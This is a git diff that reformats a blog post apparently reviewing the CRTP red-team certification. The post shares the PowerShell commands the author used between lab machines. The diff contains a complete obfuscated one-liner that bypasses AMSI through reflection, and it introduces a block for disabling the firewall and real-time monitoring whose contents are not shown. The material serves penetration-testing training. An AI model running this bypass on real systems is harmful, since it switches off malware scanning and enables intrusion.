--- a/_posts/2022-12-09-crtp.md
+++ b/_posts/2022-12-09-crtp.md
@@ -23,12 +23,14 @@ The course consists of the following sections but to be honest for the exam the 
 
 One of the key things when going from box to box I learned is how to disable AMSI and also open up the firewall and disable real-time monitoring. These were the two Powershell commands I ran each time which might be useful for others:
 
-Bypass AMSI:
+**Bypass AMSI:**
 <div class="box">
+{% highlight powershell %}
 S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
+{% endhighlight %}
 </div>
 
-Disable Multiple Things:
+**Disable Multiple Things:**
 
 <div class="box">
 {% highlight powershell %}
